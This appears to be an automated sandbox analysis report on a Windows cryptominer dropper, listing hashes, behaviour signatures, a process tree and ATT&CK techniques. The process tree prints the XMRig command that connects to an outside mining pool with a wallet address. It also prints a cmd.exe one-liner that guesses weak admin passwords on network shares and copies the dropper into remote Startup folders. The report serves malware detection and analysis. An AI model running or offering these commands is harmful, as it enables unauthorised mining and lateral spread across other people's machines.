Analysis

  • max time kernel
    30s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    06-03-2021 22:22

General

  • Target

    50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

  • Size

    2.3MB

  • MD5

    921379bd587ab29da4dc23fb9d47fe36

  • SHA1

    e9db1731731503a81a2fdc67ffa005e6aa2a8038

  • SHA256

    50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6

  • SHA512

    90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

Malware Config

Signatures

  • Modifies firewall policy service 2 TTPs 6 IoCs
  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • XMRig Miner Payload 2 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Windows security modification 2 TTPs 14 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 19 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3020
      • C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
        "C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"
        2⤵
        • Modifies firewall policy service
        • Windows security modification
        • Checks whether UAC is enabled
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:3300
        • C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
          "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"
          3⤵
          • Modifies firewall policy service
          • Executes dropped EXE
          • Deletes itself
          • Drops startup file
          • Loads dropped DLL
          • Windows security modification
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Enumerates connected drives
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:3916
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*
            4⤵
              PID:776
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im NsCpuCNMiner*
                5⤵
                • Kills process with taskkill
                PID:3840
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im IMG0*
                5⤵
                • Kills process with taskkill
                PID:3936
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*
              4⤵
                PID:2180
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im uihost*
                  5⤵
                  • Kills process with taskkill
                  PID:2988
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im DOC0*
                  5⤵
                  • Kills process with taskkill
                  PID:896
              • C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
                "C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe" -o stratum+tcp://xmr-eu2.nanopool.org:14444 -t 1 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.V --donate-level=1 --coin monero -p x
                4⤵
                  PID:3652
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
                  4⤵
                    PID:1280
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
                      5⤵
                        PID:1888
                        • C:\Windows\SysWOW64\net.exe
                          net view
                          6⤵
                          • Discovers systems in the same network
                          PID:3756
                        • C:\Windows\SysWOW64\find.exe
                          find /i "\\"
                          6⤵
                            PID:1308
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c set str_
                          5⤵
                            PID:3856
                  • C:\Windows\system32\DllHost.exe
                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                    1⤵
                      PID:3680
                    • C:\Windows\System32\RuntimeBroker.exe
                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                      1⤵
                        PID:3436
                      • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                        "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                        1⤵
                          PID:3232
                        • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                          "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                          1⤵
                            PID:3212
                          • c:\windows\system32\taskhostw.exe
                            taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                            1⤵
                              PID:2412
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                              1⤵
                                PID:2308
                              • c:\windows\system32\sihost.exe
                                sihost.exe
                                1⤵
                                  PID:2300
                                • C:\Windows\system32\dwm.exe
                                  "dwm.exe"
                                  1⤵
                                    PID:968
                                  • C:\Windows\system32\fontdrvhost.exe
                                    "fontdrvhost.exe"
                                    1⤵
                                      PID:724
                                    • C:\Windows\system32\fontdrvhost.exe
                                      "fontdrvhost.exe"
                                      1⤵
                                        PID:720
                                      • C:\Windows\system32\DllHost.exe
                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                        1⤵
                                          PID:3884
                                        • C:\Windows\system32\backgroundTaskHost.exe
                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                          1⤵
                                            PID:1276

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Persistence

                                          Modify Existing Service

                                          1
                                          T1031

                                          Registry Run Keys / Startup Folder

                                          1
                                          T1060

                                          Privilege Escalation

                                          Bypass User Account Control

                                          1
                                          T1088

                                          Defense Evasion

                                          Modify Registry

                                          6
                                          T1112

                                          Bypass User Account Control

                                          1
                                          T1088

                                          Disabling Security Tools

                                          3
                                          T1089

                                          Discovery

                                          System Information Discovery

                                          3
                                          T1082

                                          Query Registry

                                          1
                                          T1012

                                          Peripheral Device Discovery

                                          1
                                          T1120

                                          Remote System Discovery

                                          1
                                          T1018

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Temp\0F748DEE_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
                                            MD5

                                            2915b3f8b703eb744fc54c81f4a9c67f

                                            SHA1

                                            e10361a11f8a7f232ac3cb2125c1875a0a69a3e4

                                            SHA256

                                            9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

                                            SHA512

                                            84e53163c255edde6a0f2289b67166ad8c4f3e2b06e92b7d9dd3d8701a58b4c6f6c661be0c9f0777677bcd36de0a7cccc6512d953c4ba12d8b5c6a35617f3816

                                          • C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
                                            MD5

                                            921379bd587ab29da4dc23fb9d47fe36

                                            SHA1

                                            e9db1731731503a81a2fdc67ffa005e6aa2a8038

                                            SHA256

                                            50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6

                                            SHA512

                                            90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

                                          • C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
                                            MD5

                                            921379bd587ab29da4dc23fb9d47fe36

                                            SHA1

                                            e9db1731731503a81a2fdc67ffa005e6aa2a8038

                                            SHA256

                                            50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6

                                            SHA512

                                            90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc

                                          • C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
                                            MD5

                                            0211073feb4ba88254f40a2e6611fcef

                                            SHA1

                                            3ce5aeeac3a1586d291552f541b5e6508f8b7cea

                                            SHA256

                                            62dfe27768e6293eb9218ba22a3acb528df71e4cc4625b95726cd421b716f983

                                            SHA512

                                            6ce06a15c5aa0fd78e01e5a2ef0507c1eba8bfe61ca5fc8d20526cb26f029f730f0ea1c34ce56c3f5db43aff1c2b05aa548b9514b17001c61d2a46660ee11fe7

                                          • C:\Windows\SYSTEM.INI
                                            MD5

                                            46e696c9dca84bb3f778a56bbb37f39c

                                            SHA1

                                            60bae4ff0eff418314f1a3ecdf1833d7fafffac1

                                            SHA256

                                            9b2d3ad66ee2fe3f471e314572dbec4718b51e0e34dfc3ce150c52a21def4325

                                            SHA512

                                            3ef8badbdf068bbbc521934facaf64104e22cb96c3f0b017c29eb7bf0942519b80e08ca4e353e4dbb64d47b846f64843b840e0bcafa0a84fd164641bdc255876

                                          • \Users\Admin\AppData\Local\Temp\nse9CE3.tmp\inetc.dll
                                            MD5

                                            d7a3fa6a6c738b4a3c40d5602af20b08

                                            SHA1

                                            34fc75d97f640609cb6cadb001da2cb2c0b3538a

                                            SHA256

                                            67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

                                            SHA512

                                            75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

                                          • \Users\Admin\AppData\Local\Temp\nse9CE3.tmp\inetc.dll
                                            MD5

                                            d7a3fa6a6c738b4a3c40d5602af20b08

                                            SHA1

                                            34fc75d97f640609cb6cadb001da2cb2c0b3538a

                                            SHA256

                                            67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

                                            SHA512

                                            75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

                                          • \Users\Admin\AppData\Local\Temp\nse9CE3.tmp\inetc.dll
                                            MD5

                                            d7a3fa6a6c738b4a3c40d5602af20b08

                                            SHA1

                                            34fc75d97f640609cb6cadb001da2cb2c0b3538a

                                            SHA256

                                            67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

                                            SHA512

                                            75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

                                          • memory/776-16-0x0000000000000000-mapping.dmp
                                          • memory/896-21-0x0000000000000000-mapping.dmp
                                          • memory/1280-26-0x0000000000000000-mapping.dmp
                                          • memory/1280-33-0x0000000002C50000-0x0000000002C51000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1308-29-0x0000000000000000-mapping.dmp
                                          • memory/1888-27-0x0000000000000000-mapping.dmp
                                          • memory/2180-17-0x0000000000000000-mapping.dmp
                                          • memory/2988-19-0x0000000000000000-mapping.dmp
                                          • memory/3300-3-0x0000000002270000-0x0000000002272000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/3300-4-0x0000000002290000-0x0000000002291000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3300-2-0x0000000002490000-0x000000000351E000-memory.dmp
                                            Filesize

                                            16.6MB

                                          • memory/3652-25-0x0000000000180000-0x0000000000190000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3652-24-0x0000000000400000-0x00000000009E7000-memory.dmp
                                            Filesize

                                            5.9MB

                                          • memory/3652-22-0x0000000000000000-mapping.dmp
                                          • memory/3652-30-0x00000000001A0000-0x00000000001B0000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3652-39-0x0000000000BF0000-0x0000000000C00000-memory.dmp
                                            Filesize

                                            64KB

                                          • memory/3756-28-0x0000000000000000-mapping.dmp
                                          • memory/3840-18-0x0000000000000000-mapping.dmp
                                          • memory/3856-31-0x0000000000000000-mapping.dmp
                                          • memory/3856-35-0x0000000000560000-0x0000000000561000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3916-11-0x0000000002350000-0x00000000033DE000-memory.dmp
                                            Filesize

                                            16.6MB

                                          • memory/3916-5-0x0000000000000000-mapping.dmp
                                          • memory/3916-12-0x0000000004550000-0x0000000004551000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/3936-20-0x0000000000000000-mapping.dmp